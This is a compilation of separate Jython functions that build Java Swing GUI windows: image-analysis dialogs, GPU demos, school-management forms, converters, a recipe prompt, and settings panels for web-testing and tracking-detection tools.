def initUI(self): """ Finished Dialog box Simple dialog box that says "Finished", to bw displayed when all image analysis has finished. When OK button is pressed all ImageJ windows are closed. """ panel = JPanel() self.getContentPane().add(panel) panel.setBackground(Color.WHITE) panel.setLayout(None) self.setTitle("Analysis has finished") self.setSize(300, 150) OKbutton = JButton("OK", actionPerformed=self.onOK) OKbutton.setBackground(Color.BLACK) OKbutton.setBounds(80, 50, 100, 30) panel.add(OKbutton) Title = JTextArea("Analysis has finised!! :-)") Title.setBounds(15, 10, 250, 20) panel.add(Title) self.setLocationRelativeTo(None) self.setLocation(int(IJ.getScreenSize().width * 0.01), int(IJ.getScreenSize().height * 3 / 10)) self.setVisible(True)
def initUI(self): panel = JPanel(size=(50, 50)) panel.setLayout(BorderLayout()) panel.setToolTipText("A Panel container") joclButton = JButton("JOCL") joclButton.setBounds(100, 500, 100, 30) joclButton.setToolTipText("JOCL Button") panel.add(joclButton) qButton = JButton("Quit", actionPerformed=self.onQuit) qButton.setBounds(200, 500, 80, 30) qButton.setToolTipText("Quit Button") panel.add(qButton) inputImage = ImageIcon("input.png") #JLabel imageLabel = inputImage label1 = JLabel(inputImage) label1.setBounds(1, 1, inputImage.getIconWidth(), inputImage.getIconHeight()) #label1.setVerticalTextPosition(JLabel.BOTTOM) #label1.setHorizontalTextPosition(JLabel.CENTER) #label1.setSize(1,1) panel.add(label1) self.getContentPane().add(panel) self.setTitle("GPU Demo") self.setSize(1200, 600) self.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE) self.setLocationRelativeTo(None) self.setVisible(True)
def build(self): #labels cl = JLabel("Celcius") cl.setBounds(10, 10, 60, 20) fl = JLabel("Farenheit") fl.setBounds(120, 10, 60, 20) kl = JLabel("Kelvin") kl.setBounds(230, 10, 60, 20) #celcius textfield c = JTextField() c.setBounds(10, 40, 60, 20) c.addActionListener(lambda x: log(x)) #farenheit textfield f = JTextField() f.setBounds(120, 40, 60, 20) f.addActionListener(lambda x: log(x)) #kelvin textfield k = JTextField() k.setBounds(230, 40, 60, 20) k.addActionListener(lambda x: log(x)) #buttons cv = JButton("Convert") cv.addActionListener(lambda x: self.convert(x)) cv.setBounds(10, 70, 300 - 10, 30) clean = JButton("Clean") clean.addActionListener(lambda x: self.clean()) clean.setBounds(10, 110, 300 - 10, 30) #add vars to frame list(map(lambda x: self.add(x), [cl, kl, fl, c, f, k, cv, clean])) self.k = k self.c = c self.f = f self.textfields = {self.c, self.f, self.k}
def changePasswordForm(check): global frame global tfOldPassword global tfNewPassword global tfConfirmPassword global value value = check frame = JFrame("Change Password") frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE) frame.setSize(500, 350) frame.setLocation(200, 200) frame.setLayout(None) frame.setVisible(True) panel = JPanel() panel.setSize(500, 350) panel.setLocation(0, 0) panel.setLayout(None) panel.setVisible(True) panel.setBackground(Color.LIGHT_GRAY) heading = JLabel("Change Password") heading.setBounds(200, 30, 150, 40) lbOldPassword = JLabel("Old Password") lbNewPassword = JLabel("New Password") lbConfirmPassword = JLabel("Confirm Password") tfOldPassword = JTextField() tfNewPassword = JTextField() tfConfirmPassword = JTextField() lbOldPassword.setBounds(50, 100, 150, 30) lbNewPassword.setBounds(50, 150, 150, 30) lbConfirmPassword.setBounds(50, 200, 150, 30) tfOldPassword.setBounds(220, 100, 150, 30) tfNewPassword.setBounds(220, 150, 150, 30) tfConfirmPassword.setBounds(220, 200, 150, 30) btnSave = JButton("Save", actionPerformed=clickSave) btnCancel = JButton("Cancel", actionPerformed=clickCancel) btnSave.setBounds(350, 280, 100, 30) btnCancel.setBounds(50, 280, 100, 30) panel.add(heading) panel.add(lbOldPassword) panel.add(lbNewPassword) panel.add(lbConfirmPassword) panel.add(tfOldPassword) panel.add(tfNewPassword) panel.add(tfConfirmPassword) panel.add(btnSave) panel.add(btnCancel) frame.add(panel)
def addCourse(): global tfCourseName global tfCourseId global tfCourseFee global frame global btnEnter frame = JFrame("Add Course ") frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE) frame.setSize(450, 450) frame.setLocation(200, 200) frame.setLayout(None) frame.setVisible(True) panel = JPanel() panel.setSize(450, 450) panel.setLocation(0, 0) panel.setLayout(None) panel.setVisible(True) panel.setBackground(Color.LIGHT_GRAY) heading = JLabel("ADD COURSE") heading.setBounds(200, 30, 150, 40) lbCourseName = JLabel("Course Name ") lbCourseId = JLabel("Course Id") lbCourseFee = JLabel(" Course Fee") tfCourseName = JTextField() tfCourseId = JTextField() tfCourseFee = JTextField() lbCourseName.setBounds(70, 120, 130, 30) lbCourseId.setBounds(70, 170, 130, 30) lbCourseFee.setBounds(70, 220, 130, 30) tfCourseName.setBounds(220, 120, 150, 30) tfCourseId.setBounds(220, 170, 150, 30) tfCourseFee.setBounds(220, 220, 150, 30) btnEnter = JButton("Enter", actionPerformed=clickAddCourseFee) btnEnter.setBounds(300, 300, 100, 40) btnCancel = JButton("Cancel", actionPerformed=clickCancel) btnCancel.setBounds(70, 300, 100, 40) panel.add(heading) panel.add(lbCourseName) panel.add(lbCourseId) panel.add(lbCourseFee) panel.add(tfCourseFee) panel.add(tfCourseName) panel.add(tfCourseId) panel.add(tfCourseFee) panel.add(btnEnter) panel.add(btnCancel) frame.add(panel)
def getButton(self, label, positionX, positionY): """ Creates a JButton with a specific label and position """ button = JButton(label) button.setBounds(positionX, positionY, self.BUTTON_WIDTH, self.BUTTON_HEIGHT) return button
def getUiComponent(self): panel = JPanel(BorderLayout()) panel.setLocation(100, 100) panel.setLayout(None) lbl1 = JLabel("Insert URL") lbl1.setBounds(60, 20, 100, 40) txt1 = JTextField(100) txt1.setBounds(140, 20, 600, 40) def btn1Click(event): import requests from bs4 import BeautifulSoup url = requests.get("http://" + str(txt1.text)) # a=requests.get(str(txt1.text)) req = url.text links = [] soup = BeautifulSoup(url.text, 'html.parser') for link in soup.find_all('a'): links.append(link.get('href')) links = ((str(links).replace("[", "")).replace("]", "")).replace("u'", "'") txt2.text = links #set info por table2 txt2.editable = False txt2.wrapStyleWord = True txt2.lineWrap = True text2.aligmentx = Component.LEFT_ALIGMENT txt2.size(300, 1) return btn = JButton("Click", actionPerformed=btn1Click) btn.setBounds(400, 80, 60, 30) panel.add(lbl1, BorderLayout.CENTER) panel.add(txt1, BorderLayout.CENTER) panel.add(btn, BorderLayout.CENTER) lbl2 = JLabel("Output URLs") lbl2.setBounds(60, 80, 150, 40) txt2 = JTextArea() txt2.setBounds(140, 120, 600, 600) txt2.setBackground(Color.WHITE) # set table color, if you want panel.add(lbl2, BorderLayout.CENTER) panel.add(txt2, BorderLayout.CENTER) return panel
def install(helper): print('install called'); frame = JFrame("Please Input Values") frame.setLocation(100,100) frame.setSize(500,400) frame.setLayout(None) lbl1 = JLabel("Input1: ") lbl1.setBounds(60,20,60,20) txt1 = JTextField(100) txt1.setBounds(130,20,200,20) lbl2 = JLabel("Input2: ") lbl2.setBounds(60,50,100,20) txt2 = JTextField(100) txt2.setBounds(130,50,200,20) lbl3 = JLabel("Input3: ") lbl3.setBounds(60,80,140,20) txt3 = JTextField(100) txt3.setBounds(130,80,200,20) lbl4 = JLabel("Input4: ") lbl4.setBounds(60,110,180,20) txt4 = JTextField(100) txt4.setBounds(130,110,200,20) def getValues(event): print "clicked" ScriptVars.setGlobalVar("Input1",str(txt1.getText())) print(ScriptVars.getGlobalVar("Input1")) ScriptVars.setGlobalVar("Input2",str(txt2.getText())) print(ScriptVars.getGlobalVar("Input2")) ScriptVars.setGlobalVar("Input3",str(txt3.getText())) print(ScriptVars.getGlobalVar("Input3")) ScriptVars.setGlobalVar("Input4",str(txt4.getText())) print(ScriptVars.getGlobalVar("Input4")) btn = JButton("Submit", actionPerformed = getValues) btn.setBounds(160,150,100,20) frame.add(lbl1) frame.add(txt1) frame.add(lbl2) frame.add(txt2) frame.add(btn) frame.add(lbl3) frame.add(txt3) frame.add(lbl4) frame.add(txt4) frame.setVisible(True)
def install(helper): print('install called') frame = JFrame("Please Input Values") frame.setLocation(100, 100) frame.setSize(500, 400) frame.setLayout(None) lbl1 = JLabel("Input1: ") lbl1.setBounds(60, 20, 60, 20) txt1 = JTextField(100) txt1.setBounds(130, 20, 200, 20) lbl2 = JLabel("Input2: ") lbl2.setBounds(60, 50, 100, 20) txt2 = JTextField(100) txt2.setBounds(130, 50, 200, 20) lbl3 = JLabel("Input3: ") lbl3.setBounds(60, 80, 140, 20) txt3 = JTextField(100) txt3.setBounds(130, 80, 200, 20) lbl4 = JLabel("Input4: ") lbl4.setBounds(60, 110, 180, 20) txt4 = JTextField(100) txt4.setBounds(130, 110, 200, 20) def getValues(event): print "clicked" ScriptVars.setGlobalVar("Input1", str(txt1.getText())) print(ScriptVars.getGlobalVar("Input1")) ScriptVars.setGlobalVar("Input2", str(txt2.getText())) print(ScriptVars.getGlobalVar("Input2")) ScriptVars.setGlobalVar("Input3", str(txt3.getText())) print(ScriptVars.getGlobalVar("Input3")) ScriptVars.setGlobalVar("Input4", str(txt4.getText())) print(ScriptVars.getGlobalVar("Input4")) btn = JButton("Submit", actionPerformed=getValues) btn.setBounds(160, 150, 100, 20) frame.add(lbl1) frame.add(txt1) frame.add(lbl2) frame.add(txt2) frame.add(btn) frame.add(lbl3) frame.add(txt3) frame.add(lbl4) frame.add(txt4) frame.setVisible(True)
def initUI(self): panel = JPanel() self.getContentPane().add(panel) panel.setLayout(None) qbutton = JButton("Quit", actionPerformed=self.onQuit) qbutton.setBounds(50, 60, 80, 30) panel.add(qbutton) self.setTitle("Quit Button") self.setSize(300, 200) self.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE) self.setLocationRelativeTo(None) self.setVisible(True)
def output(self, value): #url = "https://dict.leo.org/englisch-deutsch/dog" #import urllib.request #with urllib.request.urlopen(url) as response: #html = response.read() #with open("leoausgabe.txt","w") as f: #f.write(str(html)) t = '' frame = JFrame( 'Lektion erstellen', defaultCloseOperation=JFrame.EXIT_ON_CLOSE, size=(500, 500), ) def change_text(event): text = feld.getText() name = feld2.getText() + ".csv" with open(name, "w") as f: f.write(text) #print(name + " gespeichert") #print(text) t = text self.send(t) #return(t) button = JButton('Lektion speichern!', actionPerformed=change_text, size=(10, 20)) button.setBounds(20, 40, 20, 40) pnl = JPanel() pnl.setLayout(BoxLayout(pnl, BoxLayout.Y_AXIS)) feld = JTextArea() feld.editable = True feld.setText("Deutsch,Englisch\n") feld2 = JTextField() feld2.setText("Ersetzen durch Namen der Lektion") pnl.add(feld2) pnl.add(feld) pnl.add(button) frame.add(pnl) frame.setVisible(True) #change_text(value) print(t) print "Lektion erstellt"
def showLoginIdPassword(data): global frame frame = JFrame("Show Id Password ") frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE) frame.setSize(500,350) frame.setLocation(200,200) frame.setLayout(None) frame.setVisible(True) panel = JPanel() panel.setSize(500,350) panel.setLocation(0,0) panel.setLayout(None) panel.setVisible(True) panel.setBackground(Color.LIGHT_GRAY) heading = JLabel("LoginId AND Password") heading.setBounds(200,30,150,40) lbLoginId = JLabel("LoginId") lbPassword = JLabel("password") tfLoginId = JTextField(data[0].encode('ascii')) tfPassword = JTextField(data[1].encode('ascii')) tfLoginId.setEditable(False) tfPassword.setEditable(False) lbLoginId.setBounds(50,100,150,30) lbPassword.setBounds(50,150,150,30) tfLoginId.setBounds(220,100,150,30) tfPassword.setBounds(220,150,150,30) btnOk = JButton("Ok",actionPerformed=clickOk) btnOk.setBounds(250,220,100,30) panel.add(heading) panel.add(lbLoginId) panel.add(lbPassword) panel.add(tfLoginId) panel.add(tfPassword) panel.add(btnOk) frame.add(panel)
def initUI(self): panel = JPanel() self.getContentPane().add(panel) panel.setLayout(None) panel.setToolTipText("A panel container") button = JButton("Button") button.setBounds(100, 60, 100, 30) button.setToolTipText("A button component") panel.add(button) self.setTitle("Tooltips") self.setSize(300, 200) self.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE) self.setLocationRelativeTo(None) self.setVisible(True)
def gui(self): # Hilfsfunktion für event # erstellt ein Rezeptobjekt anhand einer URL # schließt die GUI def create(event): url = field.getText() self.recipe = Recipe(url) frame.dispose() print("created recipe for " + self.recipe.get_title()) # der Dialog wartet, bis "continue" gesendet wird self.send("continue") # Frame erstellen frame = JFrame( 'URL eingeben', defaultCloseOperation=JFrame.EXIT_ON_CLOSE, size=(480, 200), ) frame.setLayout(None) # Text im Frame fieldlabel = JLabel() fieldlabel.setText( "<html><font size=+1>Geben Sie die Internetadresse des Rezepts ein</font></html>" ) fieldlabel.setBounds(20, 20, 500, 40) frame.add(fieldlabel) # Textfeld im Frame field = JTextField() field.setText("https://www.chefkoch.de/rezepte/...") field.setBounds(20, 60, 411, 40) frame.add(field) # Button im Frame # ruft Hilfsfunktion create auf button = JButton("Los!", actionPerformed=create) button.setBounds(155, 100, 150, 30) frame.add(button) #Frame anzeigen frame.setVisible(True)
def getCourseName(check): global frame global tfStudentCourseChoice global value value = check frame = JFrame("Course Name ") frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE) frame.setSize(500,250) frame.setLocation(200,200) frame.setLayout(None) frame.setVisible(True) panel = JPanel() panel.setSize(500,250) panel.setLocation(0,0) panel.setLayout(None) panel.setVisible(True) panel.setBackground(Color.LIGHT_GRAY) heading = JLabel("Get Course Name") heading.setBounds(200,30,150,40) lbStudentCourseChoice = JLabel("Student course name") tfStudentCourseChoice = JTextField() lbStudentCourseChoice.setBounds(50,70,150,30) tfStudentCourseChoice.setBounds(220,70,150,30) btnEnter = JButton("Enter",actionPerformed=clickStudentCourseChoice) btnCancel = JButton("Cancel",actionPerformed=clickBtnCancel) btnEnter.setBounds(350,150,100,30) btnCancel.setBounds(50,150,100,30) panel.add(heading) panel.add(lbStudentCourseChoice) panel.add(tfStudentCourseChoice) panel.add(btnEnter) panel.add(btnCancel) frame.add(panel)
def build(self): self.label = JLabel("Cup") self.label.setBounds(120, 10, 45, 15) self.label2 = JLabel("KWh") self.label2.setBounds(20, 10, 45, 15) self.label3 = JLabel() self.label3.setBounds(120, 30, 55, 15) self.textfield = JTextField() self.textfield.setBounds(15, 30, 75, 20) self.textfield.addActionListener(lambda x: self.label3.setText( str(calculate(self.textfield.getText())))) button = JButton("Calcular") button.setBounds(10, 55, 290, 35) button.addActionListener(lambda x: self.label3.setText( str(calculate(self.textfield.getText())))) for var in [ self.label, self.label2, self.label3, self.textfield, button ]: self.add(var)
def showAttendenceSheet(): global table global heading global frame global panel global btnSave global btnCancel frame = JFrame("Teacher Attendence Sheet ") frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE) frame.setSize(500, 600) frame.setLocation(200, 200) frame.setLayout(None) frame.setVisible(True) panel = JPanel() panel.setSize(500, 600) panel.setLocation(0, 0) panel.setLayout(None) panel.setVisible(True) panel.setBackground(Color.WHITE) heading = JLabel() heading.setBounds(200, 10, 150, 30) table = JTable() table.setBounds(0, 50, 500, 450) panel.add(table) btnSave = JButton("Save", actionPerformed=clickSaveBtn) btnCancel = JButton("Cancel", actionPerformed=clickCancelBtn) btnSave.setBounds(350, 540, 100, 40) btnCancel.setBounds(70, 540, 100, 40) panel.add(heading) panel.add(table) panel.add(btnSave) panel.add(btnCancel) frame.add(panel)
def initUI(self): panel = JPanel() panel.setLayout(None) panel.setToolTipText('A Panel container') button = JButton('Click') button.setBounds(120, 60, 100, 30) button.setToolTipText('A button component') panel.add(button) qbutton = JButton('Quit', actionPerformed=self.onQuit) qbutton.setBounds(10, 60, 80, 30) panel.add(qbutton) self.getContentPane().add(panel) self.setTitle('Simple') self.setSize(250, 200) self.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE) self.setLocationRelativeTo(None) self.setVisible(True)
class GUI(Helpers): def gui(self): x = 10 # panel padding y = 5 # panel padding self.panel = Panel() self.panel.setLayout(None) self.scn_lbl = JLabel("Enable scanning") self.scn_lbl.setBounds(x, y, 100, 20) self.panel.add(self.scn_lbl) self.enable = JCheckBox() self.enable.setBounds(x + 120, y, 50, 20) self.panel.add(self.enable) self.rand_lbl = JLabel("Randomize payloads") self.rand_lbl.setBounds(x, y + 15, 100, 20) self.panel.add(self.rand_lbl) self.randomize = JCheckBox() self.randomize.setBounds(x + 120, y + 15, 50, 20) self.panel.add(self.randomize) self.pyld_lbl = JLabel("Payloads List (Line separated)") self.pyld_lbl.setBounds(x, y + 30, 180, 20) self.panel.add(self.pyld_lbl) self.payloads_list = JTextArea() self.pyld_scrl = JScrollPane(self.payloads_list) self.pyld_scrl.setBounds(x, y + 50, 600, 200) self.panel.add(self.pyld_scrl) self.save_btn = JButton("Save", actionPerformed=self.save_settings) self.save_btn.setBounds(x, y + 250, 100, 30) self.panel.add(self.save_btn) # Settings loader from [utils/Helpers/load_settings] self.load_settings() return self
def initUI(self): self.panel = JPanel(size=(50,50)) self.panel.setLayout(FlowLayout( )) self.panel.setToolTipText("GPU Demo") #TODO- change this so that it deletes itself when text is entered self.textfield1 = JTextField('Smoothing Parameter',15) self.panel.add(self.textfield1) joclButton = JButton("JOCL",actionPerformed=self.onJocl) joclButton.setBounds(100, 500, 100, 30) joclButton.setToolTipText("JOCL Button") self.panel.add(joclButton) javaButton = JButton("Java",actionPerformed=self.onJava) javaButton.setBounds(100, 500, 100, 30) javaButton.setToolTipText("Java Button") self.panel.add(javaButton) qButton = JButton("Quit", actionPerformed=self.onQuit) qButton.setBounds(200, 500, 80, 30) qButton.setToolTipText("Quit Button") self.panel.add(qButton) newImage = ImageIO.read(io.File(getDataDir() + "input.png")) resizedImage = newImage.getScaledInstance(600, 600,10) newIcon = ImageIcon(resizedImage) label1 = JLabel("Input Image",newIcon, JLabel.CENTER) label1.setVerticalTextPosition(JLabel.TOP) label1.setHorizontalTextPosition(JLabel.RIGHT) label1.setSize(10,10) label1.setBackground(Color.orange) self.panel.add(label1) self.getContentPane().add(self.panel) self.clockLabel = JLabel() self.clockLabel.setSize(1,1) self.clockLabel.setBackground(Color.orange) self.clockLabel.setVerticalTextPosition(JLabel.BOTTOM) self.clockLabel.setHorizontalTextPosition(JLabel.LEFT) myClockFont = Font("Serif", Font.PLAIN, 50) self.clockLabel.setFont(myClockFont) self.panel.add(self.clockLabel) self.setTitle("Structure-oriented smoothing OpenCL Demo") self.setSize(1200, 700) self.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE) self.setLocationRelativeTo(None) self.setVisible(True)
def addDetails(self): jf0 = JFrame() jf0.setTitle("Add Issue"); jf0.setLayout(None); txtEnterIssue = JTextField(); txtEnterIssue.setName("Enter Issue Name"); txtEnterIssue.setToolTipText("Enter Issue Name Here"); txtEnterIssue.setBounds(182, 58, 473, 40); jf0.add(txtEnterIssue); txtEnterIssue.setColumns(10); btnNewButton = JButton("Add"); btnNewButton.setBounds(322, 178, 139, 41); jf0.add(btnNewButton); comboBox = JComboBox(); comboBox.setMaximumRowCount(20); comboBox.setEditable(True); comboBox.setToolTipText("Objective Name"); comboBox.setBounds(182, 125, 473, 40); jf0.add(comboBox); lblNewLabel = JLabel("Issue Name Here"); lblNewLabel.setFont(Font("Tahoma", Font.PLAIN, 16)); lblNewLabel.setBounds(25, 58, 130, 40); jf0.add(lblNewLabel); lblNewLabel_1 = JLabel("Objective Name"); lblNewLabel_1.setFont(Font("Tahoma", Font.PLAIN, 16)); lblNewLabel_1.setBounds(25, 125, 130, 40); jf0.add(lblNewLabel_1); jf0.setVisible(True) jf0.setBounds(400, 300, 700, 300) jf0.EXIT_ON_CLOSE txtEnterIssue.addKeyListener(self)
def showStudentAttendenceSheetAdminLogined(): global table global heading global frame global panel global btnok frame = JFrame("Student Attendence Sheet ") frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE) frame.setSize(500, 600) frame.setLocation(200, 200) frame.setLayout(None) frame.setVisible(True) panel = JPanel() panel.setSize(500, 600) panel.setLocation(0, 0) panel.setLayout(None) panel.setVisible(True) panel.setBackground(Color.WHITE) heading = JLabel("Student Attendence") heading.setBounds(200, 10, 150, 30) table = JTable() table.setBounds(0, 50, 500, 450) panel.add(table) btnOk = JButton("Ok", actionPerformed=clickOk) btnOk.setBounds(200, 540, 100, 40) panel.add(heading) panel.add(table) panel.add(btnOk) frame.add(panel)
def initUI(self): panel = JPanel(size=(50,50)) panel.setLayout(BorderLayout( )) panel.setToolTipText("A Panel container") joclButton = JButton("JOCL", actionPerformed=self.onJOCL) joclButton.setBounds(100, 500, 100, 30) joclButton.setToolTipText("JOCL Button") panel.add(joclButton) qButton = JButton("Quit", actionPerformed=self.onQuit) qButton.setBounds(200, 500, 80, 30) qButton.setToolTipText("Quit Button") panel.add(qButton) newImage = ImageIO.read(io.File("input.png")) resizedImage = newImage.getScaledInstance(500, 500,10) newIcon = ImageIcon(resizedImage) label1 = JLabel("Image and Text",newIcon, JLabel. CENTER) label1.setVerticalTextPosition(JLabel.BOTTOM) label1.setHorizontalTextPosition(JLabel.CENTER) label1.setSize(10,10) panel.add(label1) self.getContentPane().add(panel) self.setTitle("GPU Demo") self.setSize(1200, 600) self.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE) self.setLocationRelativeTo(None) self.setVisible(True)
def initUI(self): panel = JPanel(size=(50,50)) panel.setLayout(BorderLayout( )) panel.setToolTipText("A Panel container") joclButton = JButton("JOCL") joclButton.setBounds(100, 500, 100, 30) joclButton.setToolTipText("JOCL Button") panel.add(joclButton) qButton = JButton("Quit", actionPerformed=self.onQuit) qButton.setBounds(200, 500, 80, 30) qButton.setToolTipText("Quit Button") panel.add(qButton) inputImage = ImageIcon("input.png") #JLabel imageLabel = inputImage label1 = JLabel(inputImage) label1.setBounds(1, 1, inputImage.getIconWidth(), inputImage.getIconHeight()) #label1.setVerticalTextPosition(JLabel.BOTTOM) #label1.setHorizontalTextPosition(JLabel.CENTER) #label1.setSize(1,1) panel.add(label1) self.getContentPane().add(panel) self.setTitle("GPU Demo") self.setSize(1200, 600) self.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE) self.setLocationRelativeTo(None) self.setVisible(True)
def initUI(self): self.panel = JPanel(size=(50, 50)) self.panel.setLayout(FlowLayout()) self.panel.setToolTipText("GPU Demo") self.textfield1 = JTextField('Smoothing Parameter', 15) self.panel.add(self.textfield1) joclButton = JButton("JOCL", actionPerformed=self.onJocl) joclButton.setBounds(100, 500, 100, 30) joclButton.setToolTipText("JOCL Button") self.panel.add(joclButton) javaButton = JButton("Java", actionPerformed=self.onJava) javaButton.setBounds(100, 500, 100, 30) javaButton.setToolTipText("Java Button") self.panel.add(javaButton) qButton = JButton("Quit", actionPerformed=self.onQuit) qButton.setBounds(200, 500, 80, 30) qButton.setToolTipText("Quit Button") self.panel.add(qButton) newImage = ImageIO.read(io.File("input.png")) resizedImage = newImage.getScaledInstance(600, 600, 10) newIcon = ImageIcon(resizedImage) label1 = JLabel("Input Image", newIcon, JLabel.CENTER) label1.setVerticalTextPosition(JLabel.TOP) label1.setHorizontalTextPosition(JLabel.RIGHT) label1.setSize(10, 10) label1.setBackground(Color.orange) self.panel.add(label1) self.getContentPane().add(self.panel) self.clockLabel = JLabel() self.clockLabel.setSize(1, 1) self.clockLabel.setBackground(Color.orange) self.clockLabel.setVerticalTextPosition(JLabel.BOTTOM) self.clockLabel.setHorizontalTextPosition(JLabel.LEFT) myClockFont = Font("Serif", Font.PLAIN, 50) self.clockLabel.setFont(myClockFont) self.panel.add(self.clockLabel) self.setTitle("GPU Demo") self.setSize(1200, 600) self.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE) self.setLocationRelativeTo(None) self.setVisible(True)
def initProjSettingsTab(self): # init project settings projNameLabel = JLabel("Name:") projNameLabel.setBounds(10, 50, 140, 30) self.projName = JTextField("") self.projName.setBounds(140, 50, 320, 30) self.projName.getDocument().addDocumentListener(projTextChanged(self)) detailsLabel = JLabel("Details:") detailsLabel.setBounds(10, 120, 140, 30) reportLabel = JLabel("Generate Report:") reportLabel.setBounds(10, 375, 140, 30) types = ["DOCX","HTML","XLSX"] self.reportType = JComboBox(types) self.reportType.setBounds(10, 400, 140, 30) generateReportButton = JButton("Generate", actionPerformed=self.generateReport) generateReportButton.setBounds(160, 400, 90, 30) self.projDetails = JTextArea("", 5, 30) self.projDetails.setWrapStyleWord(True); self.projDetails.setLineWrap(True) projDetailsScroll = JScrollPane(self.projDetails) projDetailsScroll.setBounds(10, 150, 450, 175) projDetailsScroll.setVerticalScrollBarPolicy(ScrollPaneConstants.VERTICAL_SCROLLBAR_AS_NEEDED) projPathLabel = JLabel("Path:") projPathLabel.setBounds(10, 90, 140, 30) self.projPath = JTextField("") self.projPath.setBounds(140, 90, 320, 30) chooseProjPathButton = JButton("Browse...",actionPerformed=self.chooseProjPath) chooseProjPathButton.setBounds(470, 90, 100, 30) importProjButton = JButton("Import",actionPerformed=self.importProj) importProjButton.setBounds(470, 10, 100, 30) exportProjButton = JButton("Export",actionPerformed=self.exportProj) exportProjButton.setBounds(575, 10, 100, 30) openProjButton = JButton("Open Directory",actionPerformed=self.openProj) openProjButton.setBounds(680, 10, 130, 30) currentProjectLabel = JLabel("Current:") currentProjectLabel.setBounds(10, 10, 140, 30) projects = self.config.options('projects') self.currentProject = JComboBox(projects) self.currentProject.addActionListener(projectChangeHandler(self)) self.currentProject.setBounds(140, 10, 140, 30) self.autoSave = JCheckBox("Auto Save Mode") self.autoSave.setEnabled(False) # implement this feature self.autoSave.setBounds(300, 10, 140, 30) self.autoSave.setToolTipText("Will save any changed value while focus is out") addProjButton = JButton("Add / Update",actionPerformed=self.addProj) addProjButton.setBounds(10, 330, 150, 30) removeProjButton = JButton("Remove Current",actionPerformed=self.rmProj) removeProjButton.setBounds(315, 330, 146, 30) generalOptions = self.config.options('general') if 'default project' in generalOptions: defaultProj = self.config.get('general','default project') self.currentProject.getModel().setSelectedItem(defaultProj) self.projPath.setText(self.config.get('projects',self.currentProject.getSelectedItem())) self.clearProjTab = True self.projectSettings = JPanel() self.projectSettings.setBounds(0, 0, 1000, 1000) self.projectSettings.setLayout(None) self.projectSettings.add(reportLabel) self.projectSettings.add(detailsLabel) self.projectSettings.add(projPathLabel) self.projectSettings.add(addProjButton) self.projectSettings.add(openProjButton) self.projectSettings.add(projNameLabel) self.projectSettings.add(projDetailsScroll) self.projectSettings.add(importProjButton) self.projectSettings.add(exportProjButton) self.projectSettings.add(removeProjButton) self.projectSettings.add(generateReportButton) self.projectSettings.add(chooseProjPathButton) self.projectSettings.add(currentProjectLabel) self.projectSettings.add(self.projPath) self.projectSettings.add(self.autoSave) self.projectSettings.add(self.projName) self.projectSettings.add(self.reportType) self.projectSettings.add(self.currentProject)
def initUI(self): self.panel = JPanel() self.panel.setLayout(GridLayout(6, 3)) self.panel.setBorder(BorderFactory.createEmptyBorder(10, 10, 10, 10)) labelVacio1 = JLabel(' ') labelVacio2 = JLabel(' ') labelVacio3 = JLabel(' ') labelVacio4 = JLabel(' ') labelVacio5 = JLabel(' ') labelVacio6 = JLabel(' ') labelVacio7 = JLabel(' ') labelVacio8 = JLabel(' ') labelVacio9 = JLabel(' ') labelVacio10 = JLabel(' ') labelVacio11 = JLabel(' ') labelVacio12 = JLabel(' ') labelVacio13 = JLabel(' ') labelVacio14 = JLabel(' ') labelVacio15 = JLabel(' ') labelVacio16 = JLabel(' ') labelURL = JLabel(' Introduzca las URL que desee analizar:') chkboxSync = JCheckBox('Sincronizacion de cookies') self.textfieldURL = JTextField(15) chkboxResp = JCheckBox('Restauracion de cookies') labelFichero = JLabel(' O seleccione un fichero que las contenga:') self.area = JTextArea() pane = JScrollPane() pane.getViewport().add(self.area) panelFichero = JPanel() panelFichero.setLayout(None) buttonFichero = JButton("Seleccionar fichero", actionPerformed=self.open) buttonFichero.setBounds(10, 0, 200, 25) panelFichero.add(buttonFichero) buttonEjecutar = JButton("Ejecutar", actionPerformed=self.ejecutar) buttonEjecutar.setFont(Font("Tahoma", Font.BOLD, 24)) self.panel.add(labelURL) self.panel.add(labelVacio4) self.panel.add(chkboxSync) self.panel.add(self.textfieldURL) self.panel.add(labelVacio6) self.panel.add(chkboxResp) self.panel.add(labelFichero) self.panel.add(labelVacio9) self.panel.add(labelVacio10) self.panel.add(pane) self.panel.add(panelFichero) #self.panel.add(buttonFichero) self.panel.add(labelVacio11) self.panel.add(labelVacio12) self.panel.add(labelVacio13) self.panel.add(labelVacio14) self.panel.add(labelVacio15) self.panel.add(buttonEjecutar) self.panel.add(labelVacio16) self.add(self.panel) self.setTitle( "HERRAMIENTA PARA LA DETECCION DE TECNICAS DE SEGUIMIENTO DE USUARIOS EN LA WEB" ) self.setSize(1000, 450) self.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE) self.setLocationRelativeTo(None) self.setVisible(True)
